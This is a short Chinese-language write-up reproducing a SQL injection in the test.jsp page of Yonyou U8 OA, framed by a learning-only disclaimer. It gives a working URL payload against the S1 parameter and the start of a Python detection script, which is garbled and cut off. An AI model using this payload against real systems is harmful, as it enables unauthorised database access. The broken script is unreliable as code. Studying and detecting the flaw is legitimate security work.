用友OA U8 test.jsp sql注入漏洞复现
警告:本文所涉及内容只可用于交流学习,请勿使用本文提到的内容违反法律,本文和作者不提供任何担保!!!
一、漏洞详情
用友U8 OA test.jsp存在SQL注入,主要是其s1参数未做过滤,导致sql注入,漏洞影响范围为“用友U8OA”。
用友u8OA界面如下
二、漏洞复现
1、初步验证和探测
payload如下
ip:port/yyoa/common/js/menu/test.jsp?doType=101&S1=(SELECT%20MD5(1))
在url一栏测试一下,发现回显成功,判定存在sql注入
也可使用以下脚本探测
import requests
import sys
import random
import re
from requests.packages.urllib3.exceptions import InsecureRequestWarningdef title():print('+------------------------------------------')print('+输入目标url